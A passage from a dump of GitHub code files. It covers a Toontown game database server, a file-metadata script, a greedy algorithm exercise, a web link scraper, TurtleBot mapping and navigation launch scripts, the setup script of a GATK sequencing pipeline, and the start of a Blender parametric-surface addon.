self._tracker = tracker\n\n @property\n def tracker_filename(self):\n return self._tracker_filename\n\n @property\n def allocator(self):\n return self._allocator\n\n @allocator.setter\n def allocator(self, allocator):\n self._allocator = allocator\n\n def setup(self):\n self._tracker = self.open_file(self.get_filename(self._tracker_filename))\n self._min_id = self._tracker.set_default_value('next', self._min_id)\n self._allocator = UniqueIdAllocator(self._min_id, self._max_id)\n\n def has_file(self, filename):\n return filename in self._files\n\n def add_file(self, file):\n if self.has_file(file.filename):\n return\n\n file.setup()\n self._files[file.filename] = file\n\n def remove_file(self, file):\n if not self.has_file(file.filename):\n return\n\n del 
self._files[file.filename]\n file.shutdown()\n\n def get_file(self, filename):\n return self._files.get(filename)\n\n def get_filename(self, filename):\n return '%s%s' % (os.path.join(self._directory, str(filename)), self._extension)\n\n def open_file(self, filename):\n file = self._file_handler(filename)\n self.add_file(file)\n return file\n\n def close_file(self, file):\n if not isinstance(file, self._file_handler):\n raise DatabaseError('Cannot close file of invalid type: %r, expected: %r!' % (\n file, self._file_handler))\n\n self.remove_file(file)\n\n def shutdown(self):\n for file in self._files:\n self.remove_file(file)\n\nclass DatabaseJSONBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseJSONFile)\n\nclass DatabaseYAMLBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseYAMLFile)\n\nclass DatabaseTOMLBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseTOMLFile)\n\nclass DatabaseServer(io.NetworkConnector):\n notify = directNotify.newCategory('DatabaseServer')\n\n def __init__(self, *args, **kwargs):\n io.NetworkConnector.__init__(self, *args, **kwargs)\n\n self._backend = DatabaseJSONBackend()\n\n @property\n def backend(self):\n return self._backend\n\n @backend.setter\n def backend(self, backend):\n self._backend = backend\n\n def setup(self):\n self._backend.setup()\n\n io.NetworkConnector.setup(self)\n\n def handle_datagram(self, channel, sender, message_type, di):\n if message_type == types.DBSERVER_CREATE_OBJECT:\n self.handle_create_object(sender, di)\n elif message_type == types.DBSERVER_OBJECT_GET_ALL:\n self.handle_object_get_all(sender, di)\n elif message_type == types.DBSERVER_OBJECT_SET_FIELD:\n self.handle_object_set_field(sender, di)\n\n def handle_create_object(self, sender, di):\n context = di.get_uint32()\n dc_id = di.get_uint16()\n field_count = di.get_uint16()\n dc_class = self.dc_loader.dclasses_by_number.get(dc_id)\n\n if not dc_class:\n self.notify.error('Failed to create object: %d context: %d, unknown dclass!' % (\n dc_id, context))\n\n do_id = self._backend.allocator.allocate()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n file_object.set_value('dclass', dc_class.get_name())\n file_object.set_value('do_id', do_id)\n\n fields = {}\n field_packer = DCPacker()\n field_packer.set_unpack_data(di.get_remaining_bytes())\n\n for _ in xrange(field_count):\n field_id = field_packer.raw_unpack_uint16()\n field = dc_class.get_field_by_index(field_id)\n\n if not field:\n self.notify.error('Failed to unpack field: %d dclass: %s, invalid field!' % (\n field_id, dc_class.get_name()))\n\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' 
% (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n\n for index in xrange(dc_class.get_num_inherited_fields()):\n field_packer = DCPacker()\n field = dc_class.get_inherited_field(index)\n\n if not field:\n continue\n\n if field.get_name() in fields:\n continue\n\n if not field.is_db() or not field.has_default_value():\n continue\n\n field_packer.set_unpack_data(field.get_default_value())\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' % (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n\n file_object.set_value('fields', fields)\n\n self._backend.close_file(file_object)\n self._backend.tracker.set_value('next', do_id + 1)\n\n datagram = io.NetworkDatagram()\n datagram.add_header(sender, self.channel,\n types.DBSERVER_CREATE_OBJECT_RESP)\n\n datagram.add_uint32(context)\n datagram.add_uint32(do_id)\n self.handle_send_connection_datagram(datagram)\n\n def handle_object_get_all(self, sender, di):\n context = di.get_uint32()\n do_id = di.get_uint32()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n if not file_object:\n self.notify.warning('Failed to get fields for object: %d context: %d, unknown object!' % (\n do_id, context))\n\n return\n\n dc_name = file_object.get_value('dclass')\n dc_class = self.dc_loader.dclasses_by_name.get(dc_name)\n\n if not dc_class:\n self.notify.warning('Failed to query object: %d context: %d, unknown dclass: %s!' % (\n do_id, context, dc_name))\n\n return\n\n fields = file_object.get_value('fields')\n\n if not fields:\n self.notify.warning('Failed to query object: %d context %d, invalid fields!' % (\n do_id, context))\n\n return\n\n datagram = io.NetworkDatagram()\n datagram.add_header(sender, self.channel,\n types.DBSERVER_OBJECT_GET_ALL_RESP)\n\n datagram.add_uint32(context)\n datagram.add_uint8(1)\n\n field_packer = DCPacker()\n field_count = 0\n for field_name, field_args in fields.items():\n field = dc_class.get_field_by_name(field_name)\n\n if not field:\n self.notify.warning('Failed to query object %d context: %d, unknown field: %s' % (\n do_id, context, field_name))\n\n return\n\n field_packer.raw_pack_uint16(field.get_number())\n field_packer.begin_pack(field)\n field.pack_args(field_packer, field_args)\n field_packer.end_pack()\n field_count += 1\n\n self._backend.close_file(file_object)\n\n datagram.add_uint16(dc_class.get_number())\n datagram.add_uint16(field_count)\n datagram.append_data(field_packer.get_string())\n self.handle_send_connection_datagram(datagram)\n\n def handle_object_set_field(self, sender, di):\n do_id = di.get_uint32()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n if not file_object:\n self.notify.warning('Failed to set fields for object: %d, unknown object!' % (\n do_id))\n\n return\n\n dc_name = file_object.get_value('dclass')\n dc_class = self.dc_loader.dclasses_by_name.get(dc_name)\n\n if not dc_class:\n self.notify.warning('Failed to set fields for object: %d, unknown dclass: %s!' % (\n do_id, dc_name))\n\n return\n\n fields = file_object.get_value('fields')\n\n if not fields:\n self.notify.warning('Failed to set fields for object: %d, invalid fields!' 
% (\n do_id))\n\n return\n\n field_packer = DCPacker()\n field_packer.set_unpack_data(di.get_remaining_bytes())\n field_id = field_packer.raw_unpack_uint16()\n field = dc_class.get_field_by_index(field_id)\n\n if not field:\n self.notify.error('Failed to unpack field: %d dclass: %s, invalid field!' % (\n field_id, dc_class.get_name()))\n\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' % (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n file_object.set_value('fields', fields)\n\n self._backend.close_file(file_object)\n\n def shutdown(self):\n self._backend.shutdown()\n\n io.NetworkConnector.shutdown(self)\n","repo_name":"cmarshall108/toontown-otp-original","sub_path":"realtime/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20847888692","text":"'''\nScript: WK-2 Starter Script\nAuthor: Kristin Skipper\nDate: 09/03/2022\nVersion: \nPurpose: Search a file directory and iterate through to see each files path, size and Mac Times\n'''\nfrom prettytable import PrettyTable\n\n''' IMPORT STANDARD LIBRARIES '''\nimport os # File System Methods\nimport time # Time Conversion Methods\n\n''' IMPORT 3RD PARTY LIBRARIES '''\n# NONE\n\n\n''' LOCAL FUNCTIONS '''\n\n\ndef GetFileMetaData(fileName):\n ''' \n obtain filesystem metadata\n from the specified file\n specifically, fileSize and MAC Times\n \n return True, None, fileSize and MacTimeList\n '''\n try:\n\n metaData = os.stat(fileName) # Use the stat method to obtain meta data\n fileSize = metaData.st_size # Extract fileSize and MAC Times\n timeLastAccess = metaData.st_atime\n timeLastModified = metaData.st_mtime\n timeCreated = metaData.st_ctime\n\n readableTimeLastAccess = makeTimeReadable(timeLastAccess)\n readableTimeLastModified = makeTimeReadable(timeLastModified)\n readableTimeCreated = makeTimeReadable(timeCreated)\n readableTimeList = [readableTimeLastAccess, readableTimeLastModified, # Group the human-readable MAC Times in a List\n readableTimeCreated]\n return True, None, fileSize, readableTimeList\n\n except Exception as err:\n return False, str(err), None, None\n\n\ndef makeTimeReadable(timeTOChange): #function to make time human readable\n timeToModify = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(timeTOChange))\n return timeToModify\n\n\n''' MAIN ENTRY POINT '''\n\nif __name__ == '__main__':\n\n print(\"Skipper-Kristin-WK-2-Scripting-Assignment\\n\")\n print(\"First Script: Obtain File Meta Data\\n\")\n # targetFile = input(\"Enter File Path to Process: \")\n while True:\n targetDirectory = input(\"\\nPlease Enter a Directory: \")\n if os.path.isdir(targetDirectory):\n\n print(\"\\nProcessing: \", targetDirectory)\n\n dirEntries = os.listdir(targetDirectory)\n for eachEntry in dirEntries:\n\n fullPath = os.path.join(targetDirectory, eachEntry)\n success, errInfo, fileSize, timeList = GetFileMetaData(fullPath)\n\n print(\"=\" * 100)\n\n if success:\n print(\"Success: \", fullPath)\n print(\"File Size: \", fileSize)\n print(\"UTC_LastAccessed: \", timeList[0])\n print(\"UTC_LastModified: \", timeList[1])\n print(\"UTC_Created: \", timeList[2])\n else:\n print(\"Fail: \", fullPath, \"Exception = \", errInfo)\n print(eachEntry)\n else:\n print(\"\\nInvalid Directory ... 
Please Try Again\\n\")\n\nprint(\"\\nScript End\")\n","repo_name":"lifefromashes/pythonAssignment2","sub_path":"pythonClassUniversityOfArizon/Skipper-Kristin-WK-2.py","file_name":"Skipper-Kristin-WK-2.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36286167221","text":"#Uses python3\nimport sys\ndef max_dot_product(a, b):\n revenue = 0\n for i in range(len(a)):\n revenue += max(a) * max(b)\n a.pop(a.index(max(a)))\n b.pop(b.index(max(b)))\n return revenue\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n a = data[1:(n + 1)]\n b = data[(n + 1):]\n print(max_dot_product(a, b))","repo_name":"cnkyrpsgl/Coursera_2018_Data_Structures_and_Algorithms","sub_path":"algorithmic toolbox/assignment2_greedy_algorithms/dot_product.py","file_name":"dot_product.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"54"} +{"seq_id":"5911357091","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://en.wikipedia.org/wiki/Deep_learning'\n\nresponse = requests.get(url) # Connect to the URL\n\n# Parse HTML and save to BeautifulSoup object¶\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# print(soup.prettify())\nheading = soup.find(id='firstHeading').string\n\nprint(heading)\n\n# print(soup.find_all('a'))\nall_links = soup.find_all('a')\nf1 = open(\"output_links.txt\", \"w\")\nfor link in all_links:\n linkhref = link.get('href')\n f1.write(str(linkhref) + '\\n')","repo_name":"sm3mb/Python-and-Deep-Learning-Programming","sub_path":"ICP3/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18152008477","text":"\nimport os\nimport time\nimport paramiko\n\n# bc its saved locally, do rosrun\n#cd desktop\n\n#os.system('gnome-terminal -- rosrun map_server map_saver -f my_map')\n#time.sleep(6)\n#rosrun map_server map_saver -f my_map\n\n#apply pgm map filtering from nav onto pgm\nos.system('gnome-terminal -- python3 PGMReader.py')\ntime.sleep(6)\n\n#apply through crop map\nos.system('gnome-terminal -- python3 Pathable_Cell_for_Map.py')\ntime.sleep(6)\n\n\n#send over 'croppedmap.png' to turtlebot for mc website\nos.system('gnome-terminal -- scp ~/modified_map.png ubuntu@192.168.8.209:/home/ubuntu/team2/nodeServer/assets')\n\ntime.sleep(4)\n# Launch roscore in a new terminal\nos.system('gnome-terminal -- roscore')\n\n# Wait for roscore to start up\ntime.sleep(5)\n\n# Launch turtlebot3_robot.launch in a new terminal\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh.connect('192.168.8.209', username='ubuntu', password='turtlebot')\n\nshell = ssh.invoke_shell()\nshell.send('roslaunch turtlebot3_bringup turtlebot3_robot.launch\\n')\n\n# Wait for turtlebot3_robot.launch to start up\ntime.sleep(8)\n\n# Launch turtlebot3_slam.launch in a new terminal\nos.system('gnome-terminal -- roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=$HOME/map.yaml')\n\n\nwhile True:\n\ttime.sleep(1)\n","repo_name":"raziehyria/tbsavepmg","sub_path":"NavGoals.py","file_name":"NavGoals.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8581319218","text":"\"\"\"\n### 
usage\n# usage: 00_start-gatk_pipeline.py -p PARENTDIR [-e EMAIL [-n EMAIL_OPTIONS]]\n###\n\n### fix\n# dicts with samps as keys assume adaptors, ref, rglb, etc are same for reseqs\n# (the second file with samp as key will overwrite the last)\n# as of now, that hasn't created an issue\n###\n\n### TODO\n# assert 0 <= input maf <= 1\n###\n\"\"\"\n\nimport os, sys, distutils.spawn, subprocess, shutil, argparse, pandas as pd\nimport balance_queue\nfrom os import path as op\nfrom subprocess import Popen, PIPE\nfrom coadaptree import fs, pkldump, uni, luni, makedir, askforinput, Bcolors\n\n\ndef get_rgid(r1):\n \"\"\"If RGID is blank, print out the output that the pipeline would otherwise use.\"\"\"\n p1 = Popen(['zcat',r1], stdout=PIPE)\n p2 = Popen(['head', '-n1'], stdin=p1.stdout, stdout=PIPE)\n return '_'.join(p2.communicate()[0].split()[0].decode('utf-8').split('\\n')[0].split(\":\")[:4])\n\n\ndef create_sh(pooldirs, poolref, parentdir):\n # create sh files\n print(Bcolors.BOLD + '\\nwriting sh files' + Bcolors.ENDC)\n for pooldir in pooldirs:\n pool = op.basename(pooldir)\n print(Bcolors.BOLD + '\\npool = %s' % pool + Bcolors.ENDC)\n ref = poolref[pool]\n print('\\tsending pooldir and ref to 01_trim-fastq.py')\n subprocess.call([shutil.which('python'),\n op.join(os.environ['HOME'], 'gatk_pipeline/01_trim-fastq.py'),\n pooldir,\n ref])\n print(\"\\n\")\n balance_queue = op.join(os.environ['HOME'], 'gatk_pipeline/balance_queue.py')\n subprocess.call([sys.executable, balance_queue, 'trim', parentdir])\n\n\ndef get_datafiles(parentdir, f2pool, data):\n # get list of files from datatable, make sure they exist in parentdir, create symlinks in /parentdir//\n print(Bcolors.BOLD + '\\nchecking for existance of fastq files in datatable.txt' + Bcolors.ENDC)\n files = [f for f in fs(parentdir) if 'fastq' in f and 'md5' not in f]\n datafiles = data['file_name_r1'].tolist()\n for x in data['file_name_r2'].tolist():\n datafiles.append(x)\n if len(files) > len(datafiles):\n desc = 'more'\n if len(files) < len(datafiles):\n desc = 'less'\n try:\n print(Bcolors.WARNING +\n 'WARN: there are %s fastq files in %s than in datatable.txt' % (desc, parentdir) +\n Bcolors.ENDC)\n print(Bcolors.BOLD + 'Here are the files in %s' % parentdir + Bcolors.ENDC)\n [print(op.basename(x)) for x in files]\n print(Bcolors.BOLD + 'Here are the files in datatable.txt' + Bcolors.ENDC)\n [print(x) for x in datafiles]\n askforinput()\n\n except NameError:\n pass\n\n for f in datafiles:\n src = op.join(parentdir, f)\n if not op.exists(src):\n # make sure file in datatable exists\n print(\"could not find %s in %s\\nmake sure file_name in datatable is its basename\" % (f, parentdir))\n print(\"(symlinks in parentdir to fastq files in other dirs works fine, and is the intentional use)\")\n sys.exit(1)\n pooldir = op.join(parentdir, f2pool[f])\n dst = op.join(pooldir, f)\n if not op.exists(dst):\n # easy to visualize in cmdline if script is finding correct group of files by ls-ing pooldir\n os.symlink(src, dst)\n\n\ndef make_pooldirs(data, parentdir):\n # make pool dirs\n print(Bcolors.BOLD + \"\\nmaking pool dirs\" + Bcolors.ENDC)\n pools = uni(data['pool_name'].tolist())\n pooldirs = []\n for p in pools:\n DIR = op.join(parentdir, p)\n if op.exists(DIR):\n print(\"The pooldir already exists, this could overwrite previous data: %s\" % DIR)\n askforinput()\n pooldirs.append(makedir(DIR))\n makedir(op.join(DIR, 'shfiles'))\n return pooldirs\n\n\ndef handle_rg_fails(failing, warning, parentdir, data):\n if len(failing) > 0:\n 
print(Bcolors.FAIL + 'FAIL: The following samples have blank RG info.' + Bcolors.ENDC)\n for fail in failing:\n print(Bcolors.FAIL + \"FAIL: %s\" % fail + Bcolors.ENDC)\n print('exiting 00_start-pipeline.py')\n exit()\n if len(warning) > 0:\n outputs = []\n for row in data.index:\n samp = data.loc[row, 'sample_name']\n if samp in warning:\n r1 = op.join(parentdir, data.loc[row, 'file_name_r1'])\n outputs.append(\"\\t\\t%s\\t%s\" % (samp, get_rgid(r1)))\n print(Bcolors.WARNING + '\\n\\n\\tWARN: at least one of the samples has a blank RGID in the datatable.\\n' +\n '\\tWARN: If RGPU is also blank, the pipeline will assign RGPU as: $RGID.$RGLB\\n' +\n '\\tWARN: The pipeline will automatically assign the following RGIDs.\\n' +\n '\\n\\t\\tsample_name\\tassigned_RGID' +\n Bcolors.ENDC)\n for output in outputs:\n print(Bcolors.WARNING + output + Bcolors.ENDC)\n askforinput(tab='\\t', newline='')\n\n\ndef read_datatable(parentdir):\n # read in the datatable, save info for later\n datatable = op.join(parentdir, 'datatable.txt')\n if not op.exists(datatable):\n print(Bcolors.FAIL + '''FAIL: the datatable is not in the necessary path: %s\nFAIL: exiting 00_start-gatk_pipeline.py''' % datatable + Bcolors.ENDC)\n sys.exit(3)\n print(Bcolors.BOLD + 'reading datatable, getting fastq info' + Bcolors.ENDC)\n data = pd.read_csv(datatable, sep='\\t')\n rginfo = {} # key=sampname vals=rginfo\n samp2pool = {} # key=samp val=pool\n poolref = {} # key=pool val=ref.fa\n ploidy = {} # key=pool val=ploidy\n poolsamps = {} # key=pool val=sampnames\n f2samp = {} # key=f val=samp\n f2pool = {} # key=f val=pool\n adaptors = {} # key=samp val={'r1','r2'} val=adaptor\n warning = [] # whether to print out warning about optional RG info\n failing = [] # whether to print out failing about required RG info\n for row in data.index:\n samp = data.loc[row, 'sample_name']\n adaptors[samp] = {'r1': data.loc[row, 'adaptor_1'],\n 'r2': data.loc[row, 'adaptor_2']}\n pool = data.loc[row, 'pool_name']\n pooldir = op.join(parentdir, pool)\n print('\\t{}\\tsamp = {}\\tpool = {}'.format(row, samp, pool))\n if pool not in poolsamps:\n poolsamps[pool] = []\n if samp not in poolsamps[pool]:\n poolsamps[pool].append(samp)\n if samp in samp2pool:\n if samp2pool[samp] != pool:\n print(Bcolors.FAIL + 'FAIL: there are duplicate sample names with \\\ndifferent pool assignments: %s' % samp + Bcolors.ENDC)\n print('exiting')\n exit()\n samp2pool[samp] = pool\n df = data[data['pool_name'] == pool].copy()\n if not luni(df['ploidy']) == 1:\n print(Bcolors.WARNING + \n \"The ploidy values for some elements with pool name '%s' are not the same.\" % pool +\n \"\\n\\tHere are the ploidy values: %s\" % uni(df['ploidy']) +\n Bcolors.ENDC)\n askforinput()\n if samp not in ploidy:\n ploidy[samp] = data.loc[row, 'ploidy']\n if pool in poolref:\n if not poolref[pool] == data.loc[row, 'ref']:\n print(\"ref genome for samples in %s pool seems to have different paths in datatable.txt\" % pool)\n sys.exit(1)\n else:\n ref = data.loc[row, 'ref']\n if not op.exists(ref):\n print('ref for %s does not exist in path: %s' % (samp, ref))\n print('exiting 00_start-gatk_pipeline.py')\n exit()\n needed = []\n for suffix in ['.dict', '.amb', '.ann', '.bwt', '.fai', '.pac', '.sa']:\n refext = ref + suffix if suffix != '.dict' else ref.split('.fa')[0] + suffix\n if not op.exists(refext):\n needed.append(refext)\n if len(needed) > 0:\n print(Bcolors.FAIL + \n 'FAIL: the following extensions of the reference are needed to continue, \\\nplease create these files' + \n 
Bcolors.ENDC)\n for n in needed:\n print(Bcolors.FAIL + n + Bcolors.ENDC)\n print('exiting')\n exit()\n printneeded = False\n intdir = op.join(op.dirname(ref), 'intervals')\n if not op.exists(intdir):\n printneeded = True\n elif len([f for f in fs(intdir) if '.list' in f and 'batch_' in f]) == 0:\n printneeded = True\n if printneeded is True:\n print(Bcolors.FAIL + \n 'FAIL: either the intervals dir doesn not exist or there are not batch_interval.list files\\\n\\nFAIL: intdir should be here: %s\\\n\\nFAIL: interval filenames should be of the form \"batch_uniqueIDENTIFIER.list\"\\\n\\nFAIL: these files must begin with \"batch\" followed by one underscore followed\\\n\\nFAIL: by \"uniqueIDENTIFIER\" which can be any string that does not include\\\n\\nFAIL: an underscore (eg chrXIII or 0013 for batch_0013.list).' % intdir + Bcolors.ENDC)\n exit()\n poolref[pool] = ref\n rginfo[samp] = {}\n for col in ['rglb', 'rgpl', 'rgsm']: # rg info columns\n rginfo[samp][col] = data.loc[row, col]\n for f in [data.loc[row, 'file_name_r1'], data.loc[row, 'file_name_r2']]:\n if \"__\" in f:\n print(Bcolors.BOLD + \n Bcolors.FAIL + \n \"FAIL: file names cannot have double underscores, replace __ with _ (single)\" + \n Bcolors.END)\n exit()\n f2pool[f] = pool\n f2samp[op.join(pooldir, f)] = samp\n\n # hangle RG info\n rginfo[samp] = {}\n # required RG info\n for col in ['rglb', 'rgpl', 'rgsm']: # rg info columns\n if not data.loc[row, col] == data.loc[row, col]:\n failing.append('%s\\t%s' % (samp, col))\n rginfo[samp][col] = data.loc[row, col]\n # optional RG info\n for col in ['rgid', 'rgpu']:\n if data.loc[row, col] != data.loc[row, col]:\n # if nan\n rginfo[samp][col] = None\n if samp not in warning:\n warning.append(samp)\n else:\n rginfo[samp][col] = data.loc[row, col]\n\n # RG info failing/warnings\n handle_rg_fails(failing, warning, parentdir, data)\n\n pkldump(rginfo, op.join(parentdir, 'rginfo.pkl'))\n pkldump(ploidy, op.join(parentdir, 'ploidy.pkl'))\n pkldump(f2samp, op.join(parentdir, 'f2samp.pkl'))\n pkldump(poolsamps, op.join(parentdir, 'poolsamps.pkl'))\n pkldump(poolref, op.join(parentdir, 'poolref.pkl'))\n pkldump(adaptors, op.join(parentdir, 'adaptors.pkl'))\n pkldump(samp2pool, op.join(parentdir, 'samp2pool.pkl'))\n return data, f2pool, poolref\n\n\ndef check_reqs(parentdir):\n \"\"\"Check for assumed exports.\"\"\"\n \n print(Bcolors.BOLD + '\\nChecking for exported variables' + Bcolors.ENDC)\n variables = ['SLURM_ACCOUNT', 'SBATCH_ACCOUNT', 'SALLOC_ACCOUNT', 'PYTHONPATH', 'SQUEUE_FORMAT']\n \n # check to see if bash_variables file has been created\n if not op.exists(op.join(parentdir, 'bash_variables')):\n print('\\tCould not find bash_variables file in parentdir. Please create this file and add \\\nin variables from README (eg SLURM_ACCOUNT, SQUEUE_FORMAT, etc). See example in $HOME/gatk-pipeline.')\n else:\n with open(op.join(parentdir, 'bash_variables')) as bv:\n text = bv.read().split(\"\\n\")\n needed = []\n for var in variables:\n found = False\n for line in text:\n if var in line:\n found = True\n break\n if found is False:\n needed.append(var)\n if len(needed) > 0:\n print(Bcolors.FAIL + '\\tFAIL: not all bash variables were found in parentdir/bash_variables file.' 
+ Bcolors.ENDC)\n print(Bcolors.FAIL + '\\tFAIL: the following variables must be present' + Bcolors.ENDC)\n for var in needed:\n print(Bcolors.FAIL + '\\t%s' % var + Bcolors.ENDC)\n print('exiting pipeline')\n \n # check to see if bash_variables file has been sourced\n for var in variables:\n try:\n print('\\t%s = %s' % (var, os.environ[var]))\n except KeyError:\n print(Bcolors.FAIL + '\\tCould not find %s in exported vars\\n\\texport this var in parentdir/bash_variables \\\nso it can be used later in gatk_pipeline, then source this file before restarting pipeline.' % var + Bcolors.ENDC)\n print('\\texiting 00_start-gatk_pipeline.py')\n exit()\n\n # make sure an environment can be activated (activation assumed to be in parentdir/bash_variables)\n for exe in ['activate']:\n if distutils.spawn.find_executable(exe) is None:\n print(Bcolors.FAIL + '\\tcould not find %s in $PATH\\nexiting 00_start-gatk_pipeline.py' % exe\n + Bcolors.ENDC)\n if exe == 'activate':\n print(Bcolors.FAIL + '\\t\\t(the lack of activate means that the python env is not correctly installed)'\n + Bcolors.ENDC)\n exit()\n # make sure pipeline can be accessed via $HOME/gatk_pipeline\n if not op.exists(op.join(os.environ['HOME'], 'gatk_pipeline')):\n print('\\tcould not find gatk_pipeline via $HOME/gatk_pipeline\\n\\texiting 00_start-gatk_pipeline.py')\n exit()\n\n\ndef check_pyversion():\n # check python version\n pyversion = float(str(sys.version_info[0]) + '.' + str(sys.version_info[1]))\n if not pyversion >= 3.6:\n text = '''FAIL: You are using python %s. This pipeline was built with python 3.7+.\nFAIL: You will need at least python v3.6+.\nFAIL: exiting 00_start-gatk_pipeline.py\n ''' % pyversion\n print(Bcolors.BOLD + Bcolors.FAIL + text + Bcolors.ENDC)\n exit()\n\n\ndef get_pars():\n choices = ['all', 'fail', 'begin', 'end', 'pipeline-finish']\n parser = argparse.ArgumentParser(description=print(mytext),\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n requiredNAMED = parser.add_argument_group('required arguments')\n requiredNAMED.add_argument(\"-p\",\n required=True,\n default=argparse.SUPPRESS,\n dest=\"parentdir\",\n type=str,\n help=\"/path/to/directory/with/fastq.gz-files/\")\n parser.add_argument(\"-e\",\n required=False,\n dest=\"email\",\n help=\"the email address you would like to have notifications sent to\")\n parser.add_argument(\"-n\",\n default=None,\n nargs='+',\n required=False,\n dest=\"email_options\",\n help='''the type(s) of email notifications you would like to receive from the pipeline.\\\n Requires --email-address. These options are used to fill out the #SBATCH flags.\nmust be one (or multiple) of %s''' % [x for x in choices])\n parser.add_argument(\"-maf\",\n required=False,\n default='0.05',\n dest=\"maf\",\n help='''At the end of the pipeline, VCF files will be filtered for MAF. 
If the pipeline is run on a single population/pool, the user can set MAF to 0.0 so as to filter variants based on global allele frequency across populations/pools at a later time.''')\n parser.add_argument('-h', '--help',\n action='help',\n default=argparse.SUPPRESS,\n help='Show this help message and exit.\\n')\n args = parser.parse_args()\n if args.parentdir.endswith('/'):\n args.parentdir = args.parentdir[:-1]\n if args.email and args.email_options is None:\n print(Bcolors.FAIL + 'FAIL: --notification-types are required when specifying email' + Bcolors.ENDC)\n print(Bcolors.FAIL + 'FAIL: choices = {%s}\\n' % [x for x in choices] + Bcolors.ENDC)\n exit()\n if args.email_options and args.email is None:\n print(Bcolors.FAIL + 'FAIL: specifying --notification-types requires specifying \\\n--email-address\\n' + Bcolors.ENDC)\n exit()\n if args.email_options:\n for choice in args.email_options:\n if not choice.lower() in choices:\n print(Bcolors.FAIL +\n '''FAIL: There can be multiple options, but they must be from the set:''' +\n Bcolors.ENDC)\n print(Bcolors.FAIL +\n '''\\t%s\\n''' % choices +\n Bcolors.ENDC)\n exit()\n if args.email:\n if '@' not in args.email:\n print(Bcolors.FAIL + 'FAIL: email address does not have an \"@\" symbol in it, \\\nplease check input\\n' + Bcolors.ENDC)\n exit()\n if 'all' in args.email_options:\n args.email_options = ['all']\n # save email\n epkl = {'email': args.email,\n 'opts': args.email_options}\n pkldump(epkl, op.join(args.parentdir, 'email_opts.pkl'))\n\n pkldump(args.maf, op.join(args.parentdir, 'maf.pkl'))\n\n return args\n\n\ndef main():\n # parse arguments\n args = get_pars()\n\n # WARN if version = 3.6, FAIL if < 3.6\n check_pyversion()\n\n # look for exported vars (should be in /parentdir/bash_variables)\n check_reqs(args.parentdir)\n \n # determine which slurm accounts to use\n balance_queue.get_avail_accounts(args.parentdir, save=True)\n\n # read in the datatable\n data, f2pool, poolref = read_datatable(args.parentdir)\n\n# # create bedfiles to parallelize later on\n# create_bedfiles(poolref)\n\n # create directories for each group of pools to be combined\n pooldirs = make_pooldirs(data, args.parentdir)\n\n # assign fq files to pooldirs for visualization (good to double check)\n get_datafiles(args.parentdir, f2pool, data)\n\n # create and sbatch sh files\n create_sh(pooldirs, poolref, args.parentdir)\n \n print(Bcolors.BOLD +\n Bcolors.OKGREEN +\n \"\\nDone with 00_start-gatk_pipeline.py\" +\n Bcolors.ENDC)\n\n\nif __name__ == '__main__':\n mytext = Bcolors.BOLD + Bcolors.OKGREEN + '''\n*****************************************************************************\n\n\n ___| \\ | _ __|\n | _ \\ \\ __ | _ _ | _| _ \\\\ _ \\\\\n | ( | __| /_ \\ ( | ( | ( | | | __/ __/\n ___|\\___/ _/ _\\\\\\___/_|\\__/_| __/ | _| \\___|\\___|\n |\n |\n\n GATK pipeline\n\n*****************************************************************************\n\n\n''' + Bcolors.ENDC\n\n main()\n","repo_name":"CoAdapTree/gatk_pipeline","sub_path":"00_start-gatk_pipeline.py","file_name":"00_start-gatk_pipeline.py","file_ext":"py","file_size_in_byte":19099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"41884135356","text":"import bpy\nimport bpy_extras\nfrom math import *\nimport mathutils\n\nbl_info = {\n \"name\": \"Parametric\",\n \"location\": \"View3D > Add > Mesh > Add a parametric surface\",\n \"category\": \"Add Mesh\",\n \"description\": \"Add a parametric surface\",\n \"author\": \"Wannes Malfait\",\n 
